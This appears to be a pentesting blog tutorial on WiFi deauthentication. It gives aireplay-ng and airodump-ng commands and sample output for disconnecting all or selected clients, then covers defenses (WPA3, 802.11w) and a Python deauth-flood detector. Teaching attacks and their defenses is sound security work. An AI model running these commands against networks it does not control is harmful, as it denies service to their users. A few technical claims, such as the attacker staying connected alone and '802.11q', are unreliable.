GCS HOW TO
Deauth Attack: Defense and Attack
Author - GCS : NEION-4L
Published - 9 August 2024
There are two phases of pentesting: the attack phase and the defense phase. Attack deals with deauthentication attacks, fuzzing, malware creation, MitM and even bypassing techniques. Defense is more about security and privacy protection, such as training a model to detect attacks, cryptography and designing algorithms to secure data, anonymity and much more. In the previous tutorial, we went over defense techniques.
In this tutorial, we are going to find out what a deauthentication attack is all about, how it is used against a system and how to secure against it.
Deauthentication Attack
This is an attack in which the attacker sends packets to a station telling it to disconnect. It is done at the level of the WiFi IEEE 802.11 protocol.
Disconnect messages are sent telling the station to disconnect, after which it tries to connect back. Eventually it is unable to re-establish the connection because of the continuous stream of deauthentication packets from the attacker. The attacker then remains the only one connected, since the deauthentication frames are sent only to the victims.
Setting up environment
The Aircrack-NG suite is a set of tools used for WiFi hacking, monitoring WiFi networks, WiFi password cracking and much more. It includes:
- Aireplay-ng
- Airodump-ng
- Airserv-ng
- Airbase-ng
- Aircrack-ng
Now we install the Aircrack-NG package using:
1. sudo su
2. apt-get install aircrack-ng
Aircrack-NG requires root privileges since it needs low-level control of the network interface.
Deauthentication: Monitor
To use aircrack-ng, you need to know the channel the network operates on, the BSSID (short for Basic Service Set Identifier; it is the MAC address of the access point), the MAC addresses of both the station and the access point, and the ESSID (the network name). But first, let's put our network interface (wlan0) into monitor mode.
root@kali: ~# airmon-ng start wlan0
Found 3 processes that could cause trouble.
Killing them by request...
Interface Chipset Driver
wlan0 Intel ath9k - [phy0]
(monitor mode enabled on mon0)
Now we monitor the network on our wlan0 interface using airodump-ng:
root@kali: ~# airodump-ng wlan0
CH 6 ][ Elapsed: 3 mins ][ 2024-08-09 14:42
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
XX:XX:XX:XX:XX:XX -53 180 35 0 6 54e WPA2 CCMP PSK TargetNetwork
BSSID STATION PWR Rate Lost Frames Probe
XX:XX:XX:XX:XX:XX YY:YY:YY:YY:YY:YY -63 1e- 0 0 101
XX:XX:XX:XX:XX:XX ZZ:ZZ:ZZ:ZZ:ZZ:ZZ -69 1e- 1 3 42
XX:XX:XX:XX:XX:XX AA:AA:AA:AA:AA:AA -75 6e- 1 7 53
The topmost entry is the access point, while the others are the various stations connected to that access point.
Now that we have the details, we can disconnect every station so that no one can use the access point. Totally cool.
Deauthentication: Attack
Now that we have the details, we use aireplay-ng to send deauthentication frames to the target. We can either broadcast the frames to all stations or direct them at a single station.
To all stations (broadcast):
1. root@kali: ~# aireplay-ng --deauth 0 -a XX:XX:XX:XX:XX:XX wlan0mon
17:28:41 Sending DeAuth to broadcast -- BSSID: XX:XX:XX:XX:XX:XX
17:28:42 Sending DeAuth to broadcast -- BSSID: XX:XX:XX:XX:XX:XX
17:28:43 Sending DeAuth to broadcast -- BSSID: XX:XX:XX:XX:XX:XX
17:28:44 Sending DeAuth to broadcast -- BSSID: XX:XX:XX:XX:XX:XX
17:28:45 Sending DeAuth to broadcast -- BSSID: XX:XX:XX:XX:XX:XX
17:28:46 Sending DeAuth to broadcast -- BSSID: XX:XX:XX:XX:XX:XX
...
For station:
1. root@kali: ~# sudo aireplay-ng --deauth 10 -a XX:XX:XX:XX:XX:XX -c ZZ:ZZ:ZZ:ZZ:ZZ:ZZ wlan0
17:28:41 Sending DeAuth to ZZ:ZZ:ZZ:ZZ:ZZ:ZZ -- BSSID: XX:XX:XX:XX:XX:XX
17:28:42 Sending DeAuth to ZZ:ZZ:ZZ:ZZ:ZZ:ZZ -- BSSID: XX:XX:XX:XX:XX:XX
17:28:43 Sending DeAuth to ZZ:ZZ:ZZ:ZZ:ZZ:ZZ -- BSSID: XX:XX:XX:XX:XX:XX
17:28:44 Sending DeAuth to ZZ:ZZ:ZZ:ZZ:ZZ:ZZ -- BSSID: XX:XX:XX:XX:XX:XX
17:28:45 Sending DeAuth to ZZ:ZZ:ZZ:ZZ:ZZ:ZZ -- BSSID: XX:XX:XX:XX:XX:XX
...
- --deauth: Indicates a deauthentication attack
- 10: Number of deauth packets to send. Setting it to 0 sends them indefinitely
- -a: Access point (BSSID)
- -c: Station (client MAC) to target; without it the frames are broadcast to all stations
- wlan0: Network interface
And now if we check our interface again, we will notice that most of our target's stations are no longer showing: they have been logged out of the network.
1. root@kali: ~# airodump-ng wlan0
BSSID STATION PWR Rate Lost Frames Probe
XX:XX:XX:XX:XX:XX YY:YY:YY:YY:YY:YY -63 0e-24 0 42
Deauthentication Attack: Defense
An Aircrack-NG based attack can do real harm, especially where confidentiality and availability matter. Imagine uploading a new package that took you months to finish, getting disconnected mid-transfer and then being unable to find your folder. That is crippling in most cases. Here are the main techniques to protect against it:
- WPA3 encryption: WEP, WPA and WPA2 are all vulnerable to this attack, but WPA3 has stronger security measures against spoofed deauthentication frames.
- 802.11 amendments: The IEEE publishes amendments to the base 802.11 protocol, one of them being 802.11n, and others such as 802.11q and 802.11w can also be enabled. 802.11w (Protected Management Frames) is the one that actually authenticates deauthentication frames, so a forged frame is dropped; it can be enabled on both WPA2 and WPA3.
- Monitor the network constantly with tools (airodump-ng itself, or a wireless intrusion detection system) that flag bursts of deauthentication frames like the one-per-second broadcast seen above.
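The monitoring point above, as an added example that is not part of the original tutorial: a small detector that parses raw 802.11 deauthentication frames, ignores frames carrying the 802.11w Protected bit, and alerts when one BSSID emits a burst of unprotected deauths inside a sliding time window. The frames, MAC addresses and thresholds are constructed for the example, not captured traffic.

```python
import struct
from collections import defaultdict, deque

DEAUTH_SUBTYPE = 12        # 802.11 management subtype 12 = deauthentication
PROTECTED_FLAG = 0x40      # "Protected Frame" bit in the second Frame Control byte


def mac_to_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_deauth(frame):
    """Return the fields of an 802.11 deauth frame, or None for any other frame.
    Layout: FC(2) Duration(2) Addr1(6) Addr2(6) Addr3(6) SeqCtl(2) Reason(2)."""
    if len(frame) < 26:
        return None
    ftype = (frame[0] >> 2) & 0x3          # type 0 = management
    subtype = (frame[0] >> 4) & 0xF
    if ftype != 0 or subtype != DEAUTH_SUBTYPE:
        return None
    reason, = struct.unpack("<H", frame[24:26])
    return {"dst": mac_to_str(frame[4:10]), "src": mac_to_str(frame[10:16]),
            "bssid": mac_to_str(frame[16:22]), "reason": reason,
            "protected": bool(frame[1] & PROTECTED_FLAG)}


def build_deauth(dst, src, bssid, reason=7):
    """Constructed sample frame for offline testing (type 0, subtype 12, no flags)."""
    fc = bytes([DEAUTH_SUBTYPE << 4, 0x00])
    return fc + b"\x00\x00" + dst + src + bssid + b"\x00\x00" + struct.pack("<H", reason)


class DeauthFloodDetector:
    """Alert when one BSSID sends >= threshold unprotected deauths within `window` seconds."""

    def __init__(self, threshold=5, window=10.0):
        self.threshold, self.window = threshold, window
        self.recent = defaultdict(deque)    # bssid -> timestamps of recent deauths

    def observe(self, ts, frame):
        d = parse_deauth(frame)
        # Frames with the Protected bit need the 802.11w keys to forge, so only
        # unprotected deauths are counted towards the flood threshold.
        if d is None or d["protected"]:
            return None
        q = self.recent[d["bssid"]]
        q.append(ts)
        while q and ts - q[0] > self.window:  # drop timestamps outside the window
            q.popleft()
        if len(q) >= self.threshold:
            return (f"ALERT: {len(q)} deauth frames from BSSID {d['bssid']} to {d['dst']} "
                    f"within {self.window:.0f}s (reason code {d['reason']})")
        return None
```

Feed it frames from a monitor-mode capture (for example via a pcap reader) with their timestamps; the sample in the test mirrors the one-frame-per-second broadcast shown in the aireplay-ng output.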